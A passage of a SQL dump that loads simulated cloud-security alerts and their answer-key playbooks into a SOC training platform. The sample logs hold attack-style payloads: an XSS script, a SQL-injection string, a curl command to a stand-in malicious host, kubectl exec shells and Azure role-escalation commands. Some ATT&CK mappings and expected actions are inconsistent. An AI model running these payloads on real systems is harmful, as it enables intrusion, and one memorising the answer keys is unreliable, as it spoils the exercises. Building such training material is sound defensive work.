escalation\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The command and IP usage are indicative of a privilege escalation attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2035, 'GCP Service Account Hijacking Detected', 'critical', 'GCP SCC', 'A potential hijack of a service account was detected with abnormal access patterns and usage from a known malicious IP.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:17:21Z\",\"event_type\":\"service_account_access\",\"src_ip\":\"203.0.113.77\",\"username\":\"service-account-gcp\",\"hostname\":\"gcp-instance-22\",\"request_body\":\"GET /project-secrets\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account-gcp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Service account usage pattern abnormal\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /project-secrets\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Request for sensitive data indicates hijack attempt\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP and access request indicate a strong likelihood of service account hijacking.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2036, 'Unauthorized Kubernetes API Access Attempt', 'high', 'Prisma Cloud', 'A foreign IP attempted unauthorized access to the Kubernetes API, indicating a potential threat to cluster security.', 'Web Attack', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:35:10Z\",\"event_type\":\"api_access\",\"src_ip\":\"192.0.2.55\",\"dst_ip\":\"10.0.0.5\",\"username\":\"kube-admin\",\"request_body\":\"POST /api/v1/namespaces/default/pods\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous unauthorized API access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"POST /api/v1/namespaces/default/pods\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Unauthorized attempt to access Kubernetes API\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The access attempt from an external IP suggests unauthorized API usage.\"}', 'Beginner', 'CLOUD', 3, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2037, 'Serverless Function Abuse Detected', 'medium', 'Wiz', 'Anomalous activity detected in serverless function execution, possibly indicating an attempt to exploit cloud function vulnerabilities.', 'Lateral Movement', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:12:45Z\",\"event_type\":\"function_execution\",\"src_ip\":\"203.0.113.88\",\"username\":\"function-user\",\"hostname\":\"cloud-function-1\",\"command_line\":\"run_function --task=exploit_attempt\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous cloud function exploitation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"run_function --task=exploit_attempt\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicates potential function exploitation\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command and IP indicate a possible exploitation attempt of cloud functions.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2038, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'Sensitive data was accessed from an AWS S3 bucket by an unauthorized foreign IP address. This indicates a potential data exfiltration attack.', 'Data Exfil', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:25:43Z\",\"event_type\":\"data_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"unknown\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data/file.txt HTTP/1.1\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1500 times for data exfiltration activities\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"GET /sensitive-data/file.txt HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious data access request identified\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Unauthorized access to sensitive data indicates a confirmed data exfiltration attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2039, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'An unauthorized user attempted to escalate privileges within Azure IAM. This could lead to unauthorized access to critical resources.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:30Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"malicious_user\",\"hostname\":\"azure-iam\",\"command_line\":\"az role assignment create --assignee malicious_user --role Contributor\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP flagged for multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"az role assignment create --assignee malicious_user --role Contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used in privilege escalation attempts\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of unauthorized command indicates an active privilege escalation attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2040, 'GCP Service Account Hijacking Detected', 'high', 'GCP SCC', 'A service account was accessed from an unusual IP, indicating possible hijacking. This could result in unauthorized operations within the GCP environment.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:45:12Z\",\"event_type\":\"account_access\",\"src_ip\":\"192.0.2.55\",\"dst_ip\":\"10.0.1.5\",\"username\":\"service-account@example-project.iam.gserviceaccount.com\",\"hostname\":\"gcp-auth\",\"request_body\":\"GET /compute/v1/projects/example-project/zones/us-central1-a/instances\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in unauthorized GCP service account access\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account@example-project.iam.gserviceaccount.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Service account potentially compromised\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Unusual access patterns and IP indicate a possible service account hijacking.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2041, 'Prisma Cloud Kubernetes Cluster Compromise', 'critical', 'Prisma Cloud', 'Unauthorized access to Kubernetes API server detected. Potential compromise of cluster nodes and services.', 'Lateral Movement', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:37:56Z\",\"event_type\":\"api_call\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"192.168.2.100\",\"username\":\"kube-admin\",\"hostname\":\"kube-api-server\",\"request_body\":\"kubectl exec -it pod-name -- /bin/bash\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in unauthorized Kubernetes access\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"kubectl exec -it pod-name -- /bin/bash\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution detected in Kubernetes environment\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unauthorized command execution suggests a compromise in the Kubernetes cluster.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2042, 'Wiz Serverless Function Exploitation Attempt', 'high', 'Wiz', 'Exploit attempt against serverless function detected. Malicious payload used to gain unauthorized access.', 'Web Attack', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:55:21Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.99\",\"dst_ip\":\"192.168.3.15\",\"username\":\"function-user\",\"hostname\":\"api.serverless.com\",\"request_body\":\"<script>alert(\'Exploit\')</script>\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP flagged for web-based exploits\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"<script>alert(\'Exploit\')</script>\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"XSS payload detected in serverless function request\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The presence of a malicious script in the request indicates an attempted web-based exploitation.\"}', 'Beginner', 'CLOUD', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2043, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'A potential data leak has been detected from an AWS S3 bucket. An external IP has accessed sensitive files.', 'Data Exfil', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:30:00Z\",\"event_type\":\"s3_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.100\",\"username\":\"john_doe\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data/file.txt\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for data exfiltration activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Employee account used in unauthorized access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP accessing sensitive files is a clear indicator of a data leak.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2044, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'An unauthorized privilege escalation attempt was detected in Azure IAM. Anomalous activity from a known account.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:45:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin_user\",\"hostname\":\"azure.portal.com\",\"command_line\":\"az role assignment create --assignee admin_user --role Owner\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with privilege escalation attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"az role assignment create --assignee admin_user --role Owner\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used for unauthorized privilege escalation\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The command line used is a clear indicator of an attempt to escalate privileges.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2045, 'GCP Service Account Hijacking Detected', 'critical', 'GCP SCC', 'Suspicious activity detected from a GCP service account, indicating potential hijacking.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:20:00Z\",\"event_type\":\"api_call\",\"src_ip\":\"192.0.2.50\",\"dst_ip\":\"10.1.2.3\",\"username\":\"gcp-service-account\",\"hostname\":\"cloud.google.com\",\"request_body\":\"POST /v1/projects/my-project/serviceAccounts:signBlob\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to service account hijacking incidents\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"gcp-service-account\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Service account involved in unauthorized API calls\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated unauthorized API calls suggest service account hijacking.\"}', 'Beginner', 'CLOUD', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2046, 'Unauthorized Kubernetes Access via Prisma Cloud', 'high', 'Prisma Cloud', 'Detected unauthorized access to Kubernetes cluster from a suspicious IP address.', 'Lateral Movement', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"k8s_access\",\"src_ip\":\"203.0.113.60\",\"dst_ip\":\"10.2.3.4\",\"username\":\"k8s-admin\",\"hostname\":\"k8s-cluster.local\",\"command_line\":\"kubectl exec -it pod-name -- /bin/bash\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous unauthorized Kubernetes access\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl exec -it pod-name -- /bin/bash\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used in unauthorized access to Kubernetes pods\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unauthorized kubectl exec command demonstrates lateral movement within the cluster.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2047, 'Serverless Function Exploitation Detected via Wiz', 'medium', 'Wiz', 'A serverless function was exploited to execute malicious payloads from an external source.', 'Web Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:45:00Z\",\"event_type\":\"function_execution\",\"src_ip\":\"198.51.100.5\",\"dst_ip\":\"10.3.4.5\",\"username\":\"lambda-function\",\"hostname\":\"aws.lambda.amazonaws.com\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for SQL injection attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload is a classic SQL injection, indicating an attempt to exploit serverless functions.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2048, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'Unauthorized access to an S3 bucket containing sensitive data was detected from an external IP.', 'Data Exfil', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:12:45Z\",\"event_type\":\"data_access\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.10\",\"username\":\"john.doe\",\"hostname\":\"aws-s3-bucket\",\"request_body\":\"GET /sensitive-data\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1200 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Legitimate user account but suspected of compromise\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"notify_data_owner\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"External IP accessing sensitive internal data is a clear indicator of data exfiltration.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2049, 'Azure IAM Privilege Escalation Detected', 'high', 'Azure Defender', 'A user account was detected attempting privilege escalation on Azure IAM, potentially indicating unauthorized activity.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:47:30Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"203.0.113.78\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin_user\",\"hostname\":\"azure-iam\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple credential theft attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Privileged internal account used in escalation attempt\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"audit_logs\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Attempted privilege escalation by external IP indicates compromise.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2050, 'GCP Service Account Hijacking Attempt', 'critical', 'GCP SCC', 'Suspicious activity detected on a GCP service account, indicating a possible hijacking attempt.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:22:11Z\",\"event_type\":\"login_success\",\"src_ip\":\"185.199.110.34\",\"dst_ip\":\"10.1.1.15\",\"username\":\"service-account\",\"hostname\":\"gcp-instance\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.110.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known hijacking campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"GCP service account suspected of being compromised\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"enable_logging\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Service account access from a known malicious IP indicates hijacking.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2051, 'Suspicious Kubernetes Cluster Activity', 'high', 'Prisma Cloud', 'Detected suspicious command execution in Kubernetes cluster indicating potential unauthorized access.', 'Lateral Movement', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:00:05Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"10.2.2.20\",\"username\":\"kube-admin\",\"hostname\":\"k8s-node\",\"request_body\":\"\",\"command_line\":\"kubectl exec -it pod -- /bin/sh\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized Kubernetes access\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl exec -it pod -- /bin/sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command execution in Kubernetes cluster without authorization\"}}],\"expected_actions\":[\"isolate_host\",\"audit_logs\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Unauthorized command execution on Kubernetes indicates potential lateral movement.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2052, 'Serverless Function Misuse Detected', 'medium', 'Wiz', 'A serverless function was invoked with a suspicious payload indicating possible command injection.', 'Web Attack', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T18:45:25Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.0.2.123\",\"dst_ip\":\"10.3.3.30\",\"username\":\"anonymous\",\"hostname\":\"cloud-function\",\"request_body\":\"curl -s http://malicious.example.com\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with command injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"curl -s http://malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Payload indicates a command injection attempt\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\",\"notify_admin\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"Suspicious payload execution on serverless function suggests command injection.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2053, 'AWS GuardDuty: Unauthorized S3 Bucket Access Detected', 'high', 'AWS GuardDuty', 'An unauthorized access to an S3 bucket was detected from an external IP address. The attacker accessed sensitive data.', 'Data Exfiltration', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"203.0.113.5\",\"username\":\"unauthorized_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 120 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Commonly used in brute force attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP accessing the S3 bucket indicates unauthorized access.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2054, 'Azure Defender: IAM Privilege Escalation Detected', 'critical', 'Azure Defender', 'A user account was granted elevated privileges without proper authorization. This may indicate a compromised account.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.40\",\"dst_ip\":\"10.0.0.5\",\"username\":\"compromised_user\",\"hostname\":\"azure-vm1\",\"request_body\":\"\",\"command_line\":\"az role assignment create --role Owner --assignee compromised_user\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous privilege escalation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Involved in unauthorized role changes\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The unauthorized role assignment indicates possible account compromise.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2055, 'GCP SCC: Service Account Hijacking Attempt', 'high', 'GCP SCC', 'A suspicious activity detected involving a service account using anomalous IP addresses, potentially indicating hijacking.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"10.128.0.3\",\"username\":\"service-account@myproject.iam.gserviceaccount.com\",\"hostname\":\"gcp-instance\",\"request_body\":\"\",\"command_line\":\"gcloud auth activate-service-account --key-file=/path/to/key.json\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for service account abuse\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account@myproject.iam.gserviceaccount.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Service account involved in unusual access 